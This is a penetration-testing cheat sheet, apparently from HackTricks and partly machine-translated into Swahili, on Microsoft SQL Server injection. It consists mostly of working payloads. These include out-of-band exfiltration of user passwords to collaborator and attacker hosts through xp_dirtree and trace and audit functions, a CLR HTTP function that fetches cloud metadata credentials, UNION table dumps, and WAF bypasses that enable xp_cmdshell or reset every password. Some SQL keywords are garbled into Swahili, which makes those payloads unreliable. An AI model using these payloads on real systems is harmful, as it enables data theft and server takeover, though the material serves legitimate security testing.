# MSSQL Injection

{{#include ../../banners/hacktricks-training.md}}

## Active Directory enumeration

Inaweza kuwa inawezekana **kuhesabu watumiaji wa kikoa kupitia SQL injection ndani ya MSSQL** server kwa kutumia kazi zifuatazo za MSSQL:

- **`SELECT DEFAULT_DOMAIN()`**: Pata jina la kikoa cha sasa.
- **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: Ikiwa unajua jina la kikoa (_DOMAIN_ katika mfano huu) kazi hii itarudisha **SID ya mtumiaji Administrator** katika muundo wa hex. Hii itakuwa kama `0x01050000000[...]0000f401`, angalia jinsi **bytes 4 za mwisho** ni nambari **500** katika muundo wa **big endian**, ambayo ni **ID ya kawaida ya mtumiaji administrator**.\
Kazi hii itakuruhusu **kujua ID ya kikoa** (bytes zote isipokuwa za mwisho 4).
- **`SUSER_SNAME(0x01050000000[...]0000e803)`** : Kazi hii itarudisha **jina la mtumiaji la ID iliyoonyeshwa** (ikiwa ipo), katika kesi hii **0000e803** katika big endian == **1000** (kawaida hii ni ID ya mtumiaji wa kwanza wa kawaida aliyeundwa). Kisha unaweza kufikiria kwamba unaweza kufanya brute-force IDs za watumiaji kutoka 1000 hadi 2000 na pengine kupata majina yote ya watumiaji wa kikoa. Kwa mfano kwa kutumia kazi kama ifuatayo:
```python
def get_sid(n):
domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
user = struct.pack('<I', int(n))
user = user.hex()
return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
```
## **Njia mbadala za Kosa la Kosa**

Kosa la SQL linalotegemea makosa kwa kawaida linafanana na muundo kama `+AND+1=@@version--` na toleo mbalimbali zinazotokana na opereta «OR». Maswali yanayojumuisha matamko kama hayo kwa kawaida yanazuiwa na WAFs. Kama njia ya kupita, ungana na mfuatano kwa kutumia herufi %2b pamoja na matokeo ya wito maalum wa kazi zinazochochea kosa la kubadilisha aina ya data kwenye data inayotafutwa.

Mifano kadhaa ya kazi kama hizo:

- `SUSER_NAME()`
- `USER_NAME()`
- `PERMISSIONS()`
- `DB_NAME()`
- `FILE_NAME()`
- `TYPE_NAME()`
- `COL_NAME()`

Mfano wa matumizi ya kazi `USER_NAME()`:
```
https://vuln.app/getItem?id=1'%2buser_name(@@version)--
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/6.png)

## SSRF

Hizi mbinu za SSRF [zilichukuliwa kutoka hapa](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)

### `fn_xe_file_target_read_file`

Inahitaji ruhusa ya **`VIEW SERVER STATE`** kwenye seva.
```
https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
```

```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
# Or doing
Use master;
EXEC sp_helprotect 'fn_xe_file_target_read_file';
```
### `fn_get_audit_file`

Inahitaji ruhusa ya **`CONTROL SERVER`**.
```
https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))
```

```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_get_audit_file';
```
### `fn_trace_gettabe`

Inahitaji ruhusa ya **`CONTROL SERVER`**.
```
https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))
```

```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_trace_gettabe';
```
### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>

Taratibu zilizohifadhiwa kama `xp_dirtree`, ingawa hazijathibitishwa rasmi na Microsoft, zimeelezewa na wengine mtandaoni kutokana na matumizi yao katika operesheni za mtandao ndani ya MSSQL. Taratibu hizi mara nyingi hutumiwa katika Uhamasishaji wa Data nje ya Muktadha, kama inavyoonyeshwa katika mifano mbalimbali [examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) na [posts](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/).

Taratibu iliyohifadhiwa ya `xp_dirtree`, kwa mfano, inatumika kufanya maombi ya mtandao, lakini ina mipaka ya bandari ya TCP 445 pekee. Nambari ya bandari haiwezi kubadilishwa, lakini inaruhusu kusoma kutoka kwa sehemu za mtandao. Matumizi yake yanaonyeshwa katika skripti ya SQL hapa chini:
```sql
DECLARE @user varchar(100);
SELECT @user = (SELECT user);
EXEC ('master..xp_dirtree "\\' + @user + '.attacker-server\\aa"');
```
Ni muhimu kutambua kwamba njia hii inaweza isifanye kazi kwenye usanidi wa mifumo yote, kama kwenye `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` inayotumia `Windows Server 2016 Datacenter` na mipangilio ya kawaida.

Zaidi ya hayo, kuna taratibu mbadala za kuhifadhi kama `master..xp_fileexist` na `xp_subdirs` ambazo zinaweza kufikia matokeo sawa. Maelezo zaidi kuhusu `xp_fileexist` yanaweza kupatikana katika [makala ya TechNet](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx).

### `xp_cmdshell` <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>

Kwa wazi unaweza pia kutumia **`xp_cmdshell`** ili **kutekeleza** kitu kinachochochea **SSRF**. Kwa maelezo zaidi **soma sehemu husika** kwenye ukurasa:

{{#ref}}
../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/
{{#endref}}

### MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>

Kuunda CLR UDF (Common Language Runtime User Defined Function), ambayo ni msimbo ulioandikwa kwa lugha yoyote ya .NET na kukusanywa kuwa DLL, ili kupakiwa ndani ya MSSQL kwa ajili ya kutekeleza kazi za kawaida, ni mchakato unaohitaji ufikiaji wa `dbo`. Hii ina maana kwamba kawaida inapatikana tu wakati muunganisho wa hifadhidata unafanywa kama `sa` au kwa jukumu la Msimamizi.

Mradi wa Visual Studio na maelekezo ya usakinishaji yanatolewa katika [hii Github repository](https://github.com/infiniteloopltd/SQLHttp) ili kuwezesha upakuaji wa binary ndani ya MSSQL kama mkusanyiko wa CLR, hivyo kuwezesha utekelezaji wa maombi ya HTTP GET kutoka ndani ya MSSQL.

Msingi wa kazi hii umefungwa katika faili ya `http.cs`, ambayo inatumia darasa la `WebClient` kutekeleza ombi la GET na kupata maudhui kama ilivyoonyeshwa hapa chini:
```csharp
using System.Data.SqlTypes;
using System.Net;

public partial class UserDefinedFunctions
{
[Microsoft.SqlServer.Server.SqlFunction]
public static SqlString http(SqlString url)
{
var wc = new WebClient();
var html = wc.DownloadString(url.Value);
return new SqlString(html);
}
}
```
Kabla ya kutekeleza amri ya SQL `CREATE ASSEMBLY`, inashauriwa kukimbia kipande hiki cha SQL kuongeza hash ya SHA512 ya mkusanyiko kwenye orodha ya mkusanyiko inayotegemewa ya seva (inaweza kuonekana kupitia `select * from sys.trusted_assemblies;`):
```sql
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
```
Baada ya kuongeza assembly kwa mafanikio na kuunda kazi, msimbo ufuatao wa SQL unaweza kutumika kufanya maombi ya HTTP:
```sql
DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
SELECT dbo.http(@url);
```
### **Quick Exploitation: Retrieving Entire Table Contents in a Single Query**

[Trick from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/).

Njia fupi ya kutoa maudhui kamili ya jedwali katika ombi moja inahusisha kutumia kipengele cha `FOR JSON`. Njia hii ni fupi zaidi kuliko kutumia kipengele cha `FOR XML`, ambacho kinahitaji hali maalum kama "raw". Kipengele cha `FOR JSON` kinapendekezwa kwa sababu ya ufupi wake.

Hapa kuna jinsi ya kupata muundo, jedwali, na safu kutoka kwa hifadhidata ya sasa:
````sql
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:

```sql
https://vuln.app/getItem?id=1'+na+1=(chagua+concat_ws(0x3a,table_schema,table_name,column_name)a+kutoka+information_schema.columns+kwa+json+auto)--
````

### Retrieving the Current Query

[Trick from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/).

For users granted the `VIEW SERVER STATE` permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:

```sql
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
```

To check if you have the VIEW SERVER STATE permission, the following query can be used:

```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
```

## **Little tricks for WAF bypasses**

[Tricks also from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)

Non-standard whitespace characters: %C2%85 или %C2%A0:

```
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--
```

Scientific (0e) and hex (0x) notation for obfuscating UNION:

```
https://vuln.app/getItem?id=0eunion+select+null,@@version,null--

https://vuln.app/getItem?id=0xunion+select+null,@@version,null--
```

A period instead of a whitespace between FROM and a column name:

```
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
```

\N separator between SELECT and a throwaway column:

```
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
```

### WAF Bypass with unorthodox stacked queries

According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":

```sql
SELECT 'a' SELECT 'b'
```

So for example, multiple queries such as:

```sql
tumia [tempdb]  
unda meza [test] ([id] int)  
ingiza [test] thamani(1)  
chagua [id] kutoka [test]  
ondoa meza [test]
```

Can be reduced to:

```sql
tumia[tempdb]unda/**/meza[test]([id]int)ingiza[test]maadili(1)chagua[id]kutoka[test]futa/**/meza[test]
```

Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:

```
# Kuongeza exec() isiyo na maana mwishoni na kufanya WAF ifikirie kuwa hii si ombi halali
admina'union select 1,'admin','testtest123'exec('select 1')--
## Hii itakuwa:
SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123'
exec('select 1')--'

# Kutumia maswali yaliyojengwa kwa njia ya ajabu
admin'exec('update[users]set[password]=''a''')--
## Hii itakuwa:
SELECT id, username, password FROM users WHERE username = 'admin'
exec('update[users]set[password]=''a''')--'

# Au kuwezesha xp_cmdshell
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
## Hii itakuwa
select * from users where username = ' admin'
exec('sp_configure''show advanced option'',''1''reconfigure')
exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
```

## References

- [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
- [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)

{{#include ../../banners/hacktricks-training.md}}